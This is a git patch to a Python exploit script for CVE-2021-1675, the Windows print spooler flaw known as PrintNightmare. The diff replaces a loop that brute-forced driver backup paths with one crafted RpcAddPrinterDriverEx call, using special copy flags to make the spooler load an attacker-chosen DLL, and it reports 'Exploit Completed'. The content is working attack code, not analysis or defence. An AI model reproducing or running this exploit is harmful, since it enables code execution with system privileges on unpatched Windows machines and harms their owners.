From d6ecf9976e78fc9c37caa9ad1c3360447c785a96 Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 09:53:08 +0200 Subject: [PATCH] Remove brute force backup files --- CVE-2021-1675.py | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 611606b..1525298 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL): resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" - for i in range(1, 30): - try: - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) - resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) - print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) - if (resp['ErrorCode'] == 0): - print("[+] Exploit Completed") - sys.exit() - except Exception as e: - #print(e) - pass + # Just ask for a new driver with already installed files + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) + flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 + resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) + + print("[*] Stage1: {0}".format(resp['ErrorCode'])) + if (resp['ErrorCode'] == 0): + print("[+] Exploit Completed") if __name__ == '__main__':